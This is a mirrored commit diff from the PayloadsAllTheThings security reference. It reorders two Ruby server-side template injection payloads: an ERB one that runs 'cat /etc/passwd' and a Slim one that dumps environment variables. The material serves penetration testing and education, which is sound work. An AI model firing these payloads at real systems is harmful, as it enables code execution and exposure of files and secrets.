mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Sorting like basic injection part
This commit is contained in:
parent
7f1fb32980
commit
712e3b93f6
1 changed files with 5 additions and 6 deletions
|
@ -91,17 +91,16 @@ Slim:
|
|||
|
||||
### Code execution
|
||||
|
||||
Execute code using SSTI for Slim engine.
|
||||
|
||||
```powershell
|
||||
#{ %x|env| }
|
||||
```
|
||||
|
||||
Execute code using SSTI for ERB engine.
|
||||
|
||||
```ruby
|
||||
<%= system('cat /etc/passwd') %>
|
||||
```
|
||||
Execute code using SSTI for Slim engine.
|
||||
|
||||
```powershell
|
||||
#{ %x|env| }
|
||||
```
|
||||
|
||||
## Java
|
||||
|
||||
|
|
Loading…
Reference in a new issue